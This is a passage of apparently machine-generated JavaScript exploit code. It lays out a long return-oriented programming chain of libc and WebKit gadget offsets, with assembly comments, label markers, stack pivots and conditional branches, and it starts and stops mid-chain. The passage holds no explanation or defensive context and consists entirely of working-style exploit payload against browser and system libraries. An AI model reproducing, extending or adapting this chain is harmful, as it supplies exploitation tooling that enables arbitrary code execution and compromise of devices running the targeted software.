rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3158: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3159: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+193832, //L3161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3161: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+193888, //L3162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+194024, //L3166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+194008, //L3165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3164: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3166: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+194144, //L3169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+194112, //L3167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3167: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3168: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3169: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, 
//cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+194280, //L3171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194296, //L3172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194264, //L3170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+194456, //L3177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194472, //L3178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+194408, //L3174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3174: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3175: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3176: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3178: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+194584, //L3179+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+194576, //L3179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3179: db([0, 0]); // 0x0 set_gadgets([ ropchain+194600, //L3179+24 ropchain+195952, //L3173 libc_base+764760, //pop rsi ropchain+194640, //L3180 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3180: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3182: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+194760, //L3185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194744, //L3183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3183: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3185: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+194936, //L3188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194952, //L3189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194904, //L3186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+194920, //L3187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3186: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3187: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3188: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3189: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+195048, //L3191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195032, //L3190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3190: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, 
rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3192: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3193: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3194: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+195248, //L3196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+195304, //L3197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+195440, //L3201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+195424, //L3200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3199: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3201: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+195560, //L3204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195528, //L3202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L3202: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3204: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+195696, //L3206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+195712, //L3207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+195680, //L3205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3205: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3207: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+195856, //L3210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+195872, //L3211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195824, //L3208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3208: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3209: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3210: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3211: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+195944, //L3212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3212: db([0, 0]); // 0x0 //L3173: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196072, //L3215 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+196088, //L3216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196056, //L3214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3214: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3215: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3216: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+196200, //L3218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+196248, //L3221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+196216, //L3219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3218: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3219: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3221: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+196360, //L3222+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+196352, //L3222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3222: db([0, 0]); // 0x0 set_gadgets([ ropchain+196376, //L3222+24 ropchain+200688, //L3217 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3223: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3225: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+196512, //L3228 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196496, //L3226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3226: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3228: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+196600, //L3229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196616, //L3231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3232: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+196696, //L3234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3234: db([0, 0]); // 0x0 //L3233: set_gadgets([ libc_base+764760, //pop rsi ropchain+196744, //L3236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3236: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3238: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+196864, //L3241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196848, //L3239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3241: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+197008, //L3244 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196976, //L3242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196992, //L3243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+197088, //L3245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3245: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3247: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+197208, //L3250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197192, //L3248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3248: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3250: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+197384, //L3253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197400, //L3254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197352, //L3251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+197368, //L3252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3251: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L3252: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3254: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+197560, //L3258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+197528, //L3256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+197544, //L3257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3255: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3257: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3258: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+197648, //L3259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197664, //L3260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3259: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3260: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+197840, //L3262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197856, //L3263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197824, //L3261 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3261: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3262: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3263: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+197968, //L3265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+198016, //L3268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+197984, //L3266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3265: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3266: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3268: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+198128, //L3269+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+198120, //L3269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3269: db([0, 0]); // 0x0 set_gadgets([ ropchain+198144, //L3269+24 ropchain+198160, //L3264 libc_base+782311, //pop rsp ropchain+198176, //L3270 //L3264: libc_base+782311, //pop rsp ropchain+200688, //L3271 //L3270: libc_base+764760, //pop rsi ropchain+198216, //L3272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3274: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198336, //L3277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov 
rax, rdi libc_base+764760, //pop rsi ropchain+198320, //L3275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3277: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+198480, //L3280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198448, //L3278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+198464, //L3279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3278: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3280: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+198560, //L3281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3281: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3283: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198680, //L3286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198664, //L3284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3286: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+198824, //L3289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198792, //L3287 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+198808, //L3288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+198912, //L3291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3290: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3291: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198968, //L3292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3292: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3294: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+199048, //L3296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3296: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+199160, //L3297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3297: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3299: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+199280, //L3302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199264, //L3300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3300: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3302: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+199424, //L3305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199392, //L3303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+199408, //L3304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3303: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3305: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199504, //L3306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3306: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3307: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L3308: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+199632, //L3310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+199616, //L3309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3309: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3310: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+199712, //L3311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3311: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3313: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+199832, //L3316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199816, //L3314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3314: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3316: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+199912, //L3318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+199944, //L3320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3318: db([0, 